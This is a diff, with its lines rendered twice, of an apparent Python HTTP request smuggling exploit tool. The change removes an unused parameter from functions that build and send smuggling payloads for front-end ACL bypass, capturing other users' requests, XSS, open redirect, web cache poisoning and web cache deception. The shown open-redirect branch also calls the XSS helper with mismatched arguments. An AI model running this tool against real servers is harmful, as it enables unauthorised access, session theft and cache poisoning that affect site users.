|
@@ -231,16 +231,16 @@ def exploit_bypass():
|
|
if "EXPLOIT-1" in exp: # extract all exploit-1 (bypass front-end ACLs)
|
|
if "EXPLOIT-1" in exp: # extract all exploit-1 (bypass front-end ACLs)
|
|
if request_type == "TE-CL":
|
|
if request_type == "TE-CL":
|
|
if "TE-CL" in exp: # exploit 1 TE-CL
|
|
if "TE-CL" in exp: # exploit 1 TE-CL
|
|
- exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL)
|
|
elif request_type == "CL-TE":
|
|
elif request_type == "CL-TE":
|
|
if "CL-TE" in exp: # exploit 1 CL-TE
|
|
if "CL-TE" in exp: # exploit 1 CL-TE
|
|
- exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL)
|
|
elif request_type == "TE-TE":
|
|
elif request_type == "TE-TE":
|
|
if "TE-TE" in exp: # exploit 1 TE-TE
|
|
if "TE-TE" in exp: # exploit 1 TE-TE
|
|
- exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL)
|
|
elif request_type == "CL-CL":
|
|
elif request_type == "CL-CL":
|
|
if "CL-CL" in exp: # exploit 1 CL-CL
|
|
if "CL-CL" in exp: # exploit 1 CL-CL
|
|
- exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL)
|
|
else: # send all!
|
|
else: # send all!
|
|
exploit = exp.split("#")[1]
|
|
exploit = exp.split("#")[1]
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$method", method)
|
|
@@ -253,7 +253,7 @@ def exploit_bypass():
|
|
print(str(exploit))
|
|
print(str(exploit))
|
|
send_exploit(addr, SSL, exploit) # send expoit
|
|
send_exploit(addr, SSL, exploit) # send expoit
|
|
|
|
|
|
-def exploit_bypass_armed(exploit, method, path, target, restricted_path, content_length, exp, addr, SSL):
|
|
|
|
|
|
+def exploit_bypass_armed(method, path, target, restricted_path, content_length, exp, addr, SSL):
|
|
exploit = exp.split("#")[1]
|
|
exploit = exp.split("#")[1]
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$path", path)
|
|
exploit = exploit.replace("$path", path)
|
|
@@ -284,16 +284,16 @@ def exploit_reveal():
|
|
if "EXPLOIT-2" in exp: # extract exploit-2 (reveal rewriting)
|
|
if "EXPLOIT-2" in exp: # extract exploit-2 (reveal rewriting)
|
|
if request_type == "TE-CL":
|
|
if request_type == "TE-CL":
|
|
if "TE-CL" in exp: # exploit 2 TE-CL
|
|
if "TE-CL" in exp: # exploit 2 TE-CL
|
|
- exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL)
|
|
elif request_type == "CL-TE":
|
|
elif request_type == "CL-TE":
|
|
if "CL-TE" in exp: # exploit 2 CL-TE
|
|
if "CL-TE" in exp: # exploit 2 CL-TE
|
|
- exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL)
|
|
elif request_type == "TE-TE":
|
|
elif request_type == "TE-TE":
|
|
if "TE-TE" in exp: # exploit 2 TE-TE
|
|
if "TE-TE" in exp: # exploit 2 TE-TE
|
|
- exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL)
|
|
elif request_type == "CL-CL":
|
|
elif request_type == "CL-CL":
|
|
if "CL-CL" in exp: # exploit 2 CL-CL
|
|
if "CL-CL" in exp: # exploit 2 CL-CL
|
|
- exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL)
|
|
else: # send all!
|
|
else: # send all!
|
|
exploit = exp.split("#")[1]
|
|
exploit = exp.split("#")[1]
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$method", method)
|
|
@@ -306,7 +306,7 @@ def exploit_reveal():
|
|
print(str(exploit))
|
|
print(str(exploit))
|
|
send_exploit(addr, SSL, exploit) # send expoit
|
|
send_exploit(addr, SSL, exploit) # send expoit
|
|
|
|
|
|
-def exploit_reveal_armed(exploit, method, path, target, parameter, content_length, exp, addr, SSL):
|
|
|
|
|
|
+def exploit_reveal_armed(method, path, target, parameter, content_length, exp, addr, SSL):
|
|
exploit = exp.split("#")[1]
|
|
exploit = exp.split("#")[1]
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$path", path)
|
|
exploit = exploit.replace("$path", path)
|
|
@@ -338,16 +338,16 @@ def exploit_capture():
|
|
if "EXPLOIT-3" in exp: # extract exploit-3 (capture users requests)
|
|
if "EXPLOIT-3" in exp: # extract exploit-3 (capture users requests)
|
|
if request_type == "TE-CL":
|
|
if request_type == "TE-CL":
|
|
if "TE-CL" in exp: # exploit 3 TE-CL
|
|
if "TE-CL" in exp: # exploit 3 TE-CL
|
|
- exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL)
|
|
elif request_type == "CL-TE":
|
|
elif request_type == "CL-TE":
|
|
if "CL-TE" in exp: # exploit 3 CL-TE
|
|
if "CL-TE" in exp: # exploit 3 CL-TE
|
|
- exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL)
|
|
elif request_type == "TE-TE":
|
|
elif request_type == "TE-TE":
|
|
if "TE-TE" in exp: # exploit 3 TE-TE
|
|
if "TE-TE" in exp: # exploit 3 TE-TE
|
|
- exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL)
|
|
elif request_type == "CL-CL":
|
|
elif request_type == "CL-CL":
|
|
if "CL-CL" in exp: # exploit 3 CL-CL
|
|
if "CL-CL" in exp: # exploit 3 CL-CL
|
|
- exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL)
|
|
else: # send all!
|
|
else: # send all!
|
|
exploit = exp.split("#")[1]
|
|
exploit = exp.split("#")[1]
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$method", method)
|
|
@@ -361,7 +361,7 @@ def exploit_capture():
|
|
print(str(exploit))
|
|
print(str(exploit))
|
|
send_exploit(addr, SSL, exploit) # send expoit
|
|
send_exploit(addr, SSL, exploit) # send expoit
|
|
|
|
|
|
-def exploit_capture_armed(exploit, method, path, target, parameters, cookie, content_length, exp, addr, SSL):
|
|
|
|
|
|
+def exploit_capture_armed(method, path, target, parameters, cookie, content_length, exp, addr, SSL):
|
|
exploit = exp.split("#")[1]
|
|
exploit = exp.split("#")[1]
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$path", path)
|
|
exploit = exploit.replace("$path", path)
|
|
@@ -394,16 +394,16 @@ def exploit_xss():
|
|
if "EXPLOIT-4" in exp: # extract exploit-4 (re-exploit XSS)
|
|
if "EXPLOIT-4" in exp: # extract exploit-4 (re-exploit XSS)
|
|
if request_type == "TE-CL":
|
|
if request_type == "TE-CL":
|
|
if "TE-CL" in exp: # exploit 4 TE-CL
|
|
if "TE-CL" in exp: # exploit 4 TE-CL
|
|
- exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL)
|
|
elif request_type == "CL-TE":
|
|
elif request_type == "CL-TE":
|
|
if "CL-TE" in exp: # exploit 4 CL-TE
|
|
if "CL-TE" in exp: # exploit 4 CL-TE
|
|
- exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL)
|
|
elif request_type == "TE-TE":
|
|
elif request_type == "TE-TE":
|
|
if "TE-TE" in exp: # exploit 4 TE-TE
|
|
if "TE-TE" in exp: # exploit 4 TE-TE
|
|
- exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL)
|
|
elif request_type == "CL-CL":
|
|
elif request_type == "CL-CL":
|
|
if "CL-CL" in exp: # exploit 4 CL-CL
|
|
if "CL-CL" in exp: # exploit 4 CL-CL
|
|
- exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL)
|
|
else: # send all!
|
|
else: # send all!
|
|
exploit = exp.split("#")[1]
|
|
exploit = exp.split("#")[1]
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$method", method)
|
|
@@ -417,7 +417,7 @@ def exploit_xss():
|
|
print(str(exploit))
|
|
print(str(exploit))
|
|
send_exploit(addr, SSL, exploit) # send expoit
|
|
send_exploit(addr, SSL, exploit) # send expoit
|
|
|
|
|
|
-def exploit_xss_armed(exploit, method, path, target, header, xss, content_length, exp, addr, SSL):
|
|
|
|
|
|
+def exploit_xss_armed(method, path, target, header, xss, content_length, exp, addr, SSL):
|
|
exploit = exp.split("#")[1]
|
|
exploit = exp.split("#")[1]
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$path", path)
|
|
exploit = exploit.replace("$path", path)
|
|
@@ -449,16 +449,16 @@ def exploit_openredirect():
|
|
if "EXPLOIT-5" in exp: # extract exploit-5 (open-redirect)
|
|
if "EXPLOIT-5" in exp: # extract exploit-5 (open-redirect)
|
|
if request_type == "TE-CL":
|
|
if request_type == "TE-CL":
|
|
if "TE-CL" in exp: # exploit 5 TE-CL
|
|
if "TE-CL" in exp: # exploit 5 TE-CL
|
|
- exploit_xss_armed(exploit, method, path, target, location, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_xss_armed(method, path, target, location, content_length, exp, addr, SSL)
|
|
elif request_type == "CL-TE":
|
|
elif request_type == "CL-TE":
|
|
if "CL-TE" in exp: # exploit 5 CL-TE
|
|
if "CL-TE" in exp: # exploit 5 CL-TE
|
|
- exploit_xss_armed(exploit, method, path, target, location, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_xss_armed(method, path, target, location, content_length, exp, addr, SSL)
|
|
elif request_type == "TE-TE":
|
|
elif request_type == "TE-TE":
|
|
if "TE-TE" in exp: # exploit 5 TE-TE
|
|
if "TE-TE" in exp: # exploit 5 TE-TE
|
|
- exploit_xss_armed(exploit, method, path, target, location, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_xss_armed(method, path, target, location, content_length, exp, addr, SSL)
|
|
elif request_type == "CL-CL":
|
|
elif request_type == "CL-CL":
|
|
if "CL-CL" in exp: # exploit 5 CL-CL
|
|
if "CL-CL" in exp: # exploit 5 CL-CL
|
|
- exploit_xss_armed(exploit, method, path, target, location, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_xss_armed(method, path, target, location, content_length, exp, addr, SSL)
|
|
else: # send all!
|
|
else: # send all!
|
|
exploit = exp.split("#")[1]
|
|
exploit = exp.split("#")[1]
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$method", method)
|
|
@@ -471,7 +471,7 @@ def exploit_openredirect():
|
|
print(str(exploit))
|
|
print(str(exploit))
|
|
send_exploit(addr, SSL, exploit) # send expoit
|
|
send_exploit(addr, SSL, exploit) # send expoit
|
|
|
|
|
|
-def exploit_openredirect_armed(exploit, method, path, target, location, content_length, exp, addr, SSL):
|
|
|
|
|
|
+def exploit_openredirect_armed(method, path, target, location, content_length, exp, addr, SSL):
|
|
exploit = exp.split("#")[1]
|
|
exploit = exp.split("#")[1]
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$path", path)
|
|
exploit = exploit.replace("$path", path)
|
|
@@ -503,16 +503,16 @@ def exploit_poison():
|
|
if "EXPLOIT-6" in exp: # extract exploit-6 (web cache poison)
|
|
if "EXPLOIT-6" in exp: # extract exploit-6 (web cache poison)
|
|
if request_type == "TE-CL":
|
|
if request_type == "TE-CL":
|
|
if "TE-CL" in exp: # exploit 6 TE-CL
|
|
if "TE-CL" in exp: # exploit 6 TE-CL
|
|
- exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL)
|
|
elif request_type == "CL-TE":
|
|
elif request_type == "CL-TE":
|
|
if "CL-TE" in exp: # exploit 6 CL-TE
|
|
if "CL-TE" in exp: # exploit 6 CL-TE
|
|
- exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL)
|
|
elif request_type == "TE-TE":
|
|
elif request_type == "TE-TE":
|
|
if "TE-TE" in exp: # exploit 6 TE-TE
|
|
if "TE-TE" in exp: # exploit 6 TE-TE
|
|
- exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL)
|
|
elif request_type == "CL-CL":
|
|
elif request_type == "CL-CL":
|
|
if "CL-CL" in exp: # exploit 6 CL-CL
|
|
if "CL-CL" in exp: # exploit 6 CL-CL
|
|
- exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL)
|
|
else: # send all!
|
|
else: # send all!
|
|
exploit = exp.split("#")[1]
|
|
exploit = exp.split("#")[1]
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$method", method)
|
|
@@ -526,7 +526,7 @@ def exploit_poison():
|
|
print(str(exploit))
|
|
print(str(exploit))
|
|
send_exploit(addr, SSL, exploit) # send expoit
|
|
send_exploit(addr, SSL, exploit) # send expoit
|
|
|
|
|
|
-def exploit_poison_armed(exploit, method, path, target, location, script, content_length, exp, addr, SSL):
|
|
|
|
|
|
+def exploit_poison_armed(method, path, target, location, script, content_length, exp, addr, SSL):
|
|
exploit = exp.split("#")[1]
|
|
exploit = exp.split("#")[1]
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$path", path)
|
|
exploit = exploit.replace("$path", path)
|
|
@@ -558,16 +558,16 @@ def exploit_deception():
|
|
if "EXPLOIT-7" in exp: # extract exploit-7 (web cache deception)
|
|
if "EXPLOIT-7" in exp: # extract exploit-7 (web cache deception)
|
|
if request_type == "TE-CL":
|
|
if request_type == "TE-CL":
|
|
if "TE-CL" in exp: # exploit 7 TE-CL
|
|
if "TE-CL" in exp: # exploit 7 TE-CL
|
|
- exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL)
|
|
elif request_type == "CL-TE":
|
|
elif request_type == "CL-TE":
|
|
if "CL-TE" in exp: # exploit 7 CL-TE
|
|
if "CL-TE" in exp: # exploit 7 CL-TE
|
|
- exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL)
|
|
elif request_type == "TE-TE":
|
|
elif request_type == "TE-TE":
|
|
if "TE-TE" in exp: # exploit 7 TE-TE
|
|
if "TE-TE" in exp: # exploit 7 TE-TE
|
|
- exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL)
|
|
elif request_type == "CL-CL":
|
|
elif request_type == "CL-CL":
|
|
if "CL-CL" in exp: # exploit 7 CL-CL
|
|
if "CL-CL" in exp: # exploit 7 CL-CL
|
|
- exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL)
|
|
|
|
|
|
+ exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL)
|
|
else: # send all!
|
|
else: # send all!
|
|
exploit = exp.split("#")[1]
|
|
exploit = exp.split("#")[1]
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$method", method)
|
|
@@ -580,7 +580,7 @@ def exploit_deception():
|
|
print(str(exploit))
|
|
print(str(exploit))
|
|
send_exploit(addr, SSL, exploit) # send expoit
|
|
send_exploit(addr, SSL, exploit) # send expoit
|
|
|
|
|
|
-def exploit_deception_armed(exploit, method, path, target, private, content_length, exp, addr, SSL):
|
|
|
|
|
|
+def exploit_deception_armed(method, path, target, private, content_length, exp, addr, SSL):
|
|
exploit = exp.split("#")[1]
|
|
exploit = exp.split("#")[1]
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$method", method)
|
|
exploit = exploit.replace("$path", path)
|
|
exploit = exploit.replace("$path", path)
|